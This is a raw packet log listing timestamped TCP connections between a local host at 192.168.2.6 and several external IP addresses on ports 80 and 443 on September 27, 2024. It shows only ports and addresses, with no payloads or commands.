Sep 27, 2024 00:29:05.405594110 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405605078 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.405605078 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.405605078 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.405966043 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405977964 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405982971 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405988932 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405994892 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.405999899 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406004906 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406014919 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406021118 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406025887 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406037092 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406049013 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406061888 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406074047 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406085968 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406089067 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.406089067 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.406089067 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.406099081 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406120062 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406131029 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.406131029 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406131029 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.406148911 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406160116 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406179905 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406189919 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406203032 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406209946 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.406210899 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.406210899 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.406217098 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406229973 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406241894 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406254053 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406280041 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.406280041 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.406280041 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.406311035 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406322956 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406336069 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406347036 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406358004 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406368971 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406378984 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406385899 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.406385899 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.406385899 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.406393051 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406404972 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406445980 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406455994 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406455994 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.406455994 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.406455994 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.406469107 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406482935 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.406553984 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.406553984 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.406553984 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.410445929 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.410469055 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.410480976 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.410490990 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.410502911 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.410701036 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.410712957 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.410731077 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.410737991 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.410737991 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.410744905 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:05.410799026 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.410799026 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.410799026 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:05.561310053 CEST	57902	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:05.561359882 CEST	443	57902	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:05.561440945 CEST	57902	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:05.562108994 CEST	57902	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:05.562124968 CEST	443	57902	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:05.928962946 CEST	57903	443	192.168.2.6	172.67.194.216
Sep 27, 2024 00:29:05.929006100 CEST	443	57903	172.67.194.216	192.168.2.6
Sep 27, 2024 00:29:05.929069042 CEST	57903	443	192.168.2.6	172.67.194.216
Sep 27, 2024 00:29:05.930660009 CEST	57903	443	192.168.2.6	172.67.194.216
Sep 27, 2024 00:29:05.930670023 CEST	443	57903	172.67.194.216	192.168.2.6
Sep 27, 2024 00:29:06.239658117 CEST	443	57902	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:06.239823103 CEST	57902	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:06.240360022 CEST	57902	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:06.240372896 CEST	443	57902	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:06.250931978 CEST	57902	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:06.250940084 CEST	443	57902	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:06.399930954 CEST	443	57903	172.67.194.216	192.168.2.6
Sep 27, 2024 00:29:06.400022030 CEST	57903	443	192.168.2.6	172.67.194.216
Sep 27, 2024 00:29:06.403167963 CEST	57903	443	192.168.2.6	172.67.194.216
Sep 27, 2024 00:29:06.403192043 CEST	443	57903	172.67.194.216	192.168.2.6
Sep 27, 2024 00:29:06.403471947 CEST	443	57903	172.67.194.216	192.168.2.6
Sep 27, 2024 00:29:06.454341888 CEST	57903	443	192.168.2.6	172.67.194.216
Sep 27, 2024 00:29:06.462037086 CEST	57903	443	192.168.2.6	172.67.194.216
Sep 27, 2024 00:29:06.462057114 CEST	57903	443	192.168.2.6	172.67.194.216
Sep 27, 2024 00:29:06.462173939 CEST	443	57903	172.67.194.216	192.168.2.6
Sep 27, 2024 00:29:06.870532990 CEST	443	57903	172.67.194.216	192.168.2.6
Sep 27, 2024 00:29:06.870646954 CEST	443	57903	172.67.194.216	192.168.2.6
Sep 27, 2024 00:29:06.870800972 CEST	57903	443	192.168.2.6	172.67.194.216
Sep 27, 2024 00:29:06.873048067 CEST	57903	443	192.168.2.6	172.67.194.216
Sep 27, 2024 00:29:06.873080015 CEST	443	57903	172.67.194.216	192.168.2.6
Sep 27, 2024 00:29:06.873095036 CEST	57903	443	192.168.2.6	172.67.194.216
Sep 27, 2024 00:29:06.873102903 CEST	443	57903	172.67.194.216	192.168.2.6
Sep 27, 2024 00:29:06.892764091 CEST	57904	443	192.168.2.6	104.21.4.136
Sep 27, 2024 00:29:06.892800093 CEST	443	57904	104.21.4.136	192.168.2.6
Sep 27, 2024 00:29:06.892887115 CEST	57904	443	192.168.2.6	104.21.4.136
Sep 27, 2024 00:29:06.893802881 CEST	57904	443	192.168.2.6	104.21.4.136
Sep 27, 2024 00:29:06.893814087 CEST	443	57904	104.21.4.136	192.168.2.6
Sep 27, 2024 00:29:07.171421051 CEST	443	57902	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:07.171504974 CEST	443	57902	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:07.171633959 CEST	57902	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:07.171832085 CEST	57902	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:07.171853065 CEST	443	57902	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:07.173235893 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.180552959 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364537954 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364561081 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364583969 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364603996 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364613056 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364631891 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364644051 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364655972 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364695072 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364705086 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364717007 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364728928 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364739895 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364775896 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.364775896 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.364775896 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.364775896 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.364864111 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364876032 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364907026 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364917994 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364928961 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364942074 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364988089 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.364995956 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.364995956 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.364995956 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.364996910 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365010977 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365032911 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365044117 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365061045 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365113974 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365113974 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365151882 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365170002 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365180016 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365190983 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365202904 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365214109 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365225077 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365236044 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365246058 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365256071 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365272045 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365283966 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365307093 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365307093 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365307093 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365307093 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365307093 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365333080 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365447044 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365464926 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365482092 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365494013 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365504980 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365516901 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365516901 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365525007 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365537882 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365547895 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365560055 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365561008 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365575075 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365648031 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365649939 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365649939 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365678072 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365689993 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365700960 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365705967 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365720987 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365732908 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365744114 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365753889 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365765095 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365777016 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365825891 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365825891 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365825891 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365825891 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365894079 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.365962982 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365974903 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365986109 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.365998030 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366008997 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366019964 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366029978 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366044998 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.366044998 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.366055965 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366076946 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.366080046 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366096020 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366107941 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366117954 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366127968 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.366127968 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.366132021 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366142988 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.366149902 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366162062 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366174936 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.366179943 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366192102 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366204023 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366215944 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366225958 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366238117 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366250038 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.366250038 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.366250038 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.366250038 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.366331100 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366343021 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366353989 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366400957 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.366400957 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.366400957 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.366539955 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366579056 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366591930 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366604090 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.366640091 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366657972 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366668940 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366677999 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.366693020 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366775036 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.366775036 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.366785049 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366799116 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366811037 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366822958 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366842985 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.366887093 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.366966009 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366977930 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366987944 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.366997957 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.367024899 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.367041111 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.367041111 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.367046118 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.367058039 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.367068052 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.367079020 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.367089987 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.367104053 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.367105961 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.367105961 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.367105961 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.367127895 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.367136955 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.367146969 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.367158890 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.367170095 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.367187977 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.367187977 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.367197990 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.367214918 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.367225885 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.367237091 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.367238045 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.367238998 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.367250919 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.367259979 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.367275000 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.367285967 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.367295980 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.367305040 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.367319107 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.367369890 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.367369890 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.370661020 CEST	443	57904	104.21.4.136	192.168.2.6
Sep 27, 2024 00:29:07.370769024 CEST	57904	443	192.168.2.6	104.21.4.136
Sep 27, 2024 00:29:07.372551918 CEST	57904	443	192.168.2.6	104.21.4.136
Sep 27, 2024 00:29:07.372565985 CEST	443	57904	104.21.4.136	192.168.2.6
Sep 27, 2024 00:29:07.372828960 CEST	443	57904	104.21.4.136	192.168.2.6
Sep 27, 2024 00:29:07.374128103 CEST	57904	443	192.168.2.6	104.21.4.136
Sep 27, 2024 00:29:07.374144077 CEST	57904	443	192.168.2.6	104.21.4.136
Sep 27, 2024 00:29:07.374195099 CEST	443	57904	104.21.4.136	192.168.2.6
Sep 27, 2024 00:29:07.468624115 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.468650103 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.468669891 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.468682051 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.468702078 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.468733072 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.468744993 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.468755960 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.468761921 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.468777895 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.468796968 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.468807936 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.468866110 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.468888044 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.468899965 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.468916893 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.468914032 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.468914032 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.468914032 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.468914032 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.468936920 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.468947887 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.468961000 CEST	80	57901	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:07.469007969 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469007969 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469007969 CEST	57901	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:07.469007969 CEST	57901	80	192.168.2.6	147.45.44.104
